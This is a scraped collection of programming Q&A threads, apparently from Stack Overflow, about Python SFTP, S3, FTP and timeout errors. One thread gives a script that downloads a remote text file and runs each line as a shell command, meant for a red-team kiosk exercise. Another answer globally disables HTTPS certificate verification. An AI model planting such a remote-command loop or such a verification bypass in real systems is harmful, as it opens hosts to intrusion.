Python pysftp.put raises "No such file" exception although file is uploaded - python

I am using pysftp to connect to a server and upload a file to it.
cnopts = pysftp.CnOpts()
cnopts.hostkeys = None
self.sftp = pysftp.Connection(host=self.serverConnectionAuth['host'], port=self.serverConnectionAuth['port'],
username=self.serverConnectionAuth['username'], password=self.serverConnectionAuth['password'],
cnopts=cnopts)
self.sftp.put(localpath=self.filepath+filename, remotepath=filename)
Sometimes it does okay with no error, but sometime it puts the file correctly, BUT raises the following exception. The file is read and processed by another program running on the server, so I can see that the file is there and it is not corrupted
File "E:\Anaconda\envs\py35\lib\site-packages\pysftp\__init__.py", line 364, in put
confirm=confirm)
File "E:\Anaconda\envs\py35\lib\site-packages\paramiko\sftp_client.py", line 727, in put
return self.putfo(fl, remotepath, file_size, callback, confirm)
File "E:\Anaconda\envs\py35\lib\site-packages\paramiko\sftp_client.py", line 689, in putfo
s = self.stat(remotepath)
File "E:\Anaconda\envs\py35\lib\site-packages\paramiko\sftp_client.py", line 460, in stat
t, msg = self._request(CMD_STAT, path)
File "E:\Anaconda\envs\py35\lib\site-packages\paramiko\sftp_client.py", line 780, in _request
return self._read_response(num)
File "E:\Anaconda\envs\py35\lib\site-packages\paramiko\sftp_client.py", line 832, in _read_response
self._convert_status(msg)
File "E:\Anaconda\envs\py35\lib\site-packages\paramiko\sftp_client.py", line 861, in _convert_status
raise IOError(errno.ENOENT, text)
FileNotFoundError: [Errno 2] No such file
How can I prevent the exception?

From the described behaviour, I assume that the file is removed very shortly after it is uploaded by some server-side process.
By default pysftp.Connection.put verifies the upload by checking a size of the target file. If the server-side processes manages to remove the file too fast, reading the file size would fail.
You can disable the post-upload check by setting confirm parameter to False:
self.sftp.put(localpath=self.filepath+filename, remotepath=filename, confirm=False)
I believe the check is redundant anyway, see
How to perform checksums during a SFTP file transfer for data integrity?
For a similar question about Paramiko (which pysftp uses internally), see:
Paramiko put method throws "[Errno 2] File not found" if SFTP server has trigger to automatically move file upon upload

Also had this issue of the file automatically getting moved before paramiko could do an os.stat on the uploaded file and compare the local and uploaded file sizes.
#Martin_Prikryl solution works works fine for removing the error by passing in confirm=False when using sftp.put or sftp.putfo
If you want this check to still run to verify the file has been uploaded fully you can run something along these lines. For this to work you will need to know the moved file location and have the ability to read the file.
import os
sftp.putfo(source_file_object, destination_file, confirm=False)
upload_size = sftp.stat(moved_path).st_size
local_size = os.stat(source_file_object).st_size
if upload_size != local_size:
raise IOError(
"size mismatch in put! {} != {}".format(upload_size, local_size)
)
Both checks use os.stat

Related

Use multiprocess for boto3 s3 upload_fileobj causes SSLError

In AWS Lambda with runtimes python3.9 and boto3-1.20.32, I run the following code,
s3_client = boto3.client(service_name="s3")
s3_bucket = "bucket"
s3_other_bucket = "other_bucket"
def multiprocess_s3upload(tar_index: dict):
def _upload(filename, bytes_range):
src_key = ...
# get single raw file in tar with bytes range
s3_obj = s3_client.get_object(
Bucket=s3_bucket,
Key=src_key,
Range=f"bytes={bytes_range}"
)
# upload raw file
# error occur !!!!!
s3_client.upload_fileobj(
s3_obj["Body"],
s3_other_bucket,
filename
)
def _wait(procs):
for p in procs:
p.join()
processes = []
proc_limit = 256 # limit concurrent processes to avoid "open too much files" error
for filename, bytes_range in tar_index.items():
# filename = "hello.txt"
# bytes_range = "1024-2048"
proc = Process(
target=_upload,
args=(filename, bytes_range)
)
proc.start()
processes.append(proc)
if len(processes) == proc_limit:
_wait(processes)
processes = []
_wait(processes)
This program is extract partial raw files in a tar file in a s3 bucket, then upload each raw file to another s3 bucket. There may be thousands of raw files in a tar file, so I use multiprocess to speed up s3 upload operation.
And, I got the exception in a subprocess about SSLError for processing the same tar file randomly. I tried different tar file and got the same result. Only the last one subprocess threw the exception, the remaining worked fine.
Process Process-2:
Traceback (most recent call last):
File "/var/runtime/urllib3/response.py", line 441, in _error_catcher
yield
File "/var/runtime/urllib3/response.py", line 522, in read
data = self._fp.read(amt) if not fp_closed else b""
File "/var/lang/lib/python3.9/http/client.py", line 463, in read
n = self.readinto(b)
File "/var/lang/lib/python3.9/http/client.py", line 507, in readinto
n = self.fp.readinto(b)
File "/var/lang/lib/python3.9/socket.py", line 704, in readinto
return self._sock.recv_into(b)
File "/var/lang/lib/python3.9/ssl.py", line 1242, in recv_into
return self.read(nbytes, buffer)
File "/var/lang/lib/python3.9/ssl.py", line 1100, in read
return self._sslobj.read(len, buffer)
ssl.SSLError: [SSL: WRONG_VERSION_NUMBER] wrong version number (_ssl.c:2633)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/var/lang/lib/python3.9/multiprocessing/process.py", line 315, in _bootstrap
self._target(*self._args, **self._kwargs)
File "/var/task/main.py", line 144, in _upload
s3_client.upload_fileobj(
File "/var/runtime/boto3/s3/inject.py", line 540, in upload_fileobj
return future.result()
File "/var/runtime/s3transfer/futures.py", line 103, in result
return self._coordinator.result()
File "/var/runtime/s3transfer/futures.py", line 266, in result
raise self._exception
File "/var/runtime/s3transfer/tasks.py", line 269, in _main
self._submit(transfer_future=transfer_future, **kwargs)
File "/var/runtime/s3transfer/upload.py", line 588, in _submit
if not upload_input_manager.requires_multipart_upload(
File "/var/runtime/s3transfer/upload.py", line 404, in requires_multipart_upload
self._initial_data = self._read(fileobj, threshold, False)
File "/var/runtime/s3transfer/upload.py", line 463, in _read
return fileobj.read(amount)
File "/var/runtime/botocore/response.py", line 82, in read
chunk = self._raw_stream.read(amt)
File "/var/runtime/urllib3/response.py", line 544, in read
raise IncompleteRead(self._fp_bytes_read, self.length_remaining)
File "/var/lang/lib/python3.9/contextlib.py", line 137, in __exit__
self.gen.throw(typ, value, traceback)
File "/var/runtime/urllib3/response.py", line 452, in _error_catcher
raise SSLError(e)
urllib3.exceptions.SSLError: [SSL: WRONG_VERSION_NUMBER] wrong version number (_ssl.c:2633)
According to this 10-years-ago similar question Multi-threaded S3 download doesn't terminate, the root cause might be boto3 s3 upload use a non-thread-safe library for sending http request. But, the solution doesn't work for me.
I found a boto3 issue about my question. This the problem has disappeared without any change on the author part.
Actually, the problem has recently disappeared on its own, without any (!) change on my part. As I thought, the problem was created and fixed by Amazon. I'm only afraid what if it will be a thing again...
Does anyone know how to fix this?
According to boto3 documentation about multiprocessing (doc),
Resource instances are not thread safe and should not be shared across threads or processes. These special classes contain additional meta data that cannot be shared. It's recommended to create a new Resource for each thread or process:
My modified code,
def multiprocess_s3upload(tar_index: dict):
def _upload(filename, bytes_range):
src_key = ...
# get single raw file in tar with bytes range
s3_client = boto3.client(service_name="s3") # <<<< one clien per thread
s3_obj = s3_client.get_object(
Bucket=s3_bucket,
Key=src_key,
Range=f"bytes={bytes_range}"
)
# upload raw file
s3_client.upload_fileobj(
s3_obj["Body"],
s3_other_bucket,
filename
)
def _wait(procs):
...
...
It seems that no SSLError exception occurs.

python read and run commands from a remote text file

I have a script that is supposed to read a text file from a remote server, and then execute whatever is in the txt file.
For example, if the text file has the command: "ls". The computer will run the command and list directory.
Also, pls don't suggest using urllib2 or whatever. I want to stick with python3.x
As soon as i run it i get this error:
Traceback (most recent call last):
File "test.py", line 4, in <module>
data = urllib.request.urlopen(IP_Address)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 222, in urlopen
return opener.open(url, data, timeout)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 509, in open
req = Request(fullurl, data)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 328, in __init__
self.full_url = url
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 354, in full_url
self._parse()
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 383, in _parse
raise ValueError("unknown url type: %r" % self.full_url) ValueError: unknown url type: 'domain.com/test.txt'
Here is my code:
import urllib.request
IP_Address = "domain.com/test.txt"
data = urllib.request.urlopen(IP_Address)
for line in data:
print("####")
os.system(line)
Edit:
yes i realize this is a bad idea. It is a school project, we are playing red team and we are supposed to get access to a kiosk. I figured instead of writing code that will try and get around intrusion detection and firewalls, it would just be easier to execute commands from a remote server. Thanks for the help everyone!
The error occurs because your url does not include a protocol. Include "http://" (or https if you're using ssl/tls) and it should work.
As others have commented, this is a dangerous thing to do since someone could run arbitrary commands on your system this way.
Try
“http://localhost/domain.com/test.txt"
Or remote address
If local host need to run http server

Python script timeouts while uploading to an ftp server

I'm creating an csv file and uploading it to a ftp server.
So the upload includes paths of multiple companies on that ftp server.
like :
COMANY1/FOO/BAR
But for some companies at the end I get this traceback:
Traceback (most recent call last):
File "exporter.py", line 117, in <module>
Exporter().run()
File "exporter.py", line 115, in run
self.upload(file, vendor['ftp_path'], filename)
File "exporter.py", line 78, in upload
sftp.chdir(dir)
File "/home/johndoe/exports/daily/venv/local/lib/python2.7/site-packages/paramiko/sftp_client.py", line 580, in chdir
if not stat.S_ISDIR(self.stat(path).st_mode):
File "/home/johndoe/exports/daily/venv/local/lib/python2.7/site-packages/paramiko/sftp_client.py", line 413, in stat
t, msg = self._request(CMD_STAT, path)
File "/home/johndoe/exports/daily/venv/local/lib/python2.7/site-packages/paramiko/sftp_client.py", line 730, in _request
return self._read_response(num)
File "/home/johndoe/exports/daily/venv/local/lib/python2.7/site-packages/paramiko/sftp_client.py", line 781, in _read_response
self._convert_status(msg)
File "/home/johndoe/exports/daily/venv/local/lib/python2.7/site-packages/paramiko/sftp_client.py", line 807, in _convert_status
raise IOError(errno.ENOENT, text)
IOError: [Errno 2] The requested file does not exist
I think the stack trace refers to the ftp path, that it doesn't exists (but It does exist).
But when I try to run that script on those exact same paths alone (that are causing the problem) it passes?
So, its not a logical error, and those ftp paths do exist - but can it be due to some timeout occurring?
Thanks,
Tom
Update:
I call the method like this:
self.upload(file, vendor['ftp_path'], filename)
And the actual method that does the uploading:
def upload(self, buffer, ftp_dir, filename):
for dir in ftp_dir.split('/'):
if dir == '':
continue
sftp.chdir(dir)
with sftp.open(filename, 'w') as f:
f.write(buffer)
f.close()
sftp.close()

Python script suddenly throwing timeout exceptions

I have a Python script that downloads product feeds from multiple affiliates in different ways. This didn't give me any problems until last Wednesday, when it started throwing all kinds of timeout exceptions from different locations.
Examples: Here I connect with a FTP service:
ftp = FTP(host=self.host)
threw:
Exception in thread Thread-7:
Traceback (most recent call last):
File "C:\Python27\Lib\threading.py", line 810, in __bootstrap_inner
self.run()
File "C:\Python27\Lib\threading.py", line 763, in run
self.__target(*self.__args, **self.__kwargs)
File "C:\Users\Administrator\Documents\Crawler\src\Crawlers\LDLC.py", line 23, in main
ftp = FTP(host=self.host)
File "C:\Python27\Lib\ftplib.py", line 120, in __init__
self.connect(host)
File "C:\Python27\Lib\ftplib.py", line 138, in connect
self.welcome = self.getresp()
File "C:\Python27\Lib\ftplib.py", line 215, in getresp
resp = self.getmultiline()
File "C:\Python27\Lib\ftplib.py", line 201, in getmultiline
line = self.getline()
File "C:\Python27\Lib\ftplib.py", line 186, in getline
line = self.file.readline(self.maxline + 1)
File "C:\Python27\Lib\socket.py", line 476, in readline
data = self._sock.recv(self._rbufsize)
timeout: timed out
Or downloading an XML File :
xmlFile = urllib.URLopener()
xmlFile.retrieve(url, self.feedPath + affiliate + "/" + website + '.' + fileType)
xmlFile.close()
throws:
File "C:\Users\Administrator\Documents\Crawler\src\Crawlers\FeedCrawler.py", line 106, in save
xmlFile.retrieve(url, self.feedPath + affiliate + "/" + website + '.' + fileType)
File "C:\Python27\Lib\urllib.py", line 240, in retrieve
fp = self.open(url, data)
File "C:\Python27\Lib\urllib.py", line 208, in open
return getattr(self, name)(url)
File "C:\Python27\Lib\urllib.py", line 346, in open_http
errcode, errmsg, headers = h.getreply()
File "C:\Python27\Lib\httplib.py", line 1139, in getreply
response = self._conn.getresponse()
File "C:\Python27\Lib\httplib.py", line 1067, in getresponse
response.begin()
File "C:\Python27\Lib\httplib.py", line 409, in begin
version, status, reason = self._read_status()
File "C:\Python27\Lib\httplib.py", line 365, in _read_status
line = self.fp.readline(_MAXLINE + 1)
File "C:\Python27\Lib\socket.py", line 476, in readline
data = self._sock.recv(self._rbufsize)
IOError: [Errno socket error] timed out
These are just two examples but there are other methods, like authenticate or other API specific methods where my script throws these timeout errors. It never showed this behavior until Wednesday. Also, it starts throwing them at random times. Sometimes at the beginning of the crawl, sometimes later on. My script has this behavior on both my server and my local machine. I've been struggling with it for two days now but can't seem to figure it out.
This is what I know might have caused this:
On Wednesday one affiliate script broke down with the following error:
URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:581)>
I didn't change anything to my script but suddenly it stopped crawling that affiliate and threw that error all the time where I tried to authenticate. I looked it up and found that is was due to an OpenSSL error (where did that come from). I fixed it by adding the following before the authenticate method:
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
Little did I know, this was just the start of my problems... At that same time, I changed from Python 2.7.8 to Python 2.7.9. It seems that this is the moment that everything broke down and started throwing timeouts.
I tried changing my script in endless ways but nothing worked and like I said, it's not just one method that throws it. Also I switched back to Python 2.7.8, but this didn't do the trick either. Basically everything that makes a request to an external source can throw an error.
Final note: My script is multi threaded. It downloads product feeds from different affiliates at the same time. It used to run 10 threads per affiliate without a problem. Now I tried lowering it to 3 per affiliate, but it still throws these errors. Setting it to 1 is no option because that will take ages. I don't think that's the problem anyway because it used to work fine.
What could be wrong?

ftplib connecting error error_proto 150 in python

Im using this code to connect and to get list of directory from a ftp. It works but in some computer I receive ftplib.error_proto: 150. Whats the meaning of this error? Is this error due to anti-virus or permission issues? My os is windows xp.
-Edited
#http_pool = urllib3.connection_from_url(myurl)
#r1 = http_pool.get_url(myurl)
#print r1.data
Sorry I post the wrong code above. Im using ftplib
self.ftp = FTP(webhost)
self.ftp.login(username, password)
x = self.ftp.retrlines('LIST')
Error message:
File "ftplib.pyo", line 421, in retrlines
File "ftplib.pyo", line 360, in transfercmd
File "ftplib.pyo", line 329, in ntransfercmd
File "ftplib.pyo", line 243, in sendcmd
File "ftplib.pyo", line 219, in getresp
ftplib.error_proto: 150
thanks
Unfortunately urllib3 does not support the FTP protocol. We've given some thought of adding support for more protocols but it's not going to happen soon.
For FTP, have a look at things like ftplib or one of the many options on PyPI.
I was getting the same error. I tried following the same processes through console. For me this error was being thrown when there was a network connection issue. I wrote a a funtion with decorator retrying. To keep on retrying connecting with remort until successful:
Example:
#retry(wait_random_min=1000, wait_random_max=2000)
def connect_to_remort(self)
self.ftp = FTP(webhost)
self.ftp.login(username, password)
x = self.ftp.retrlines('LIST')
print(x)

Categories

Resources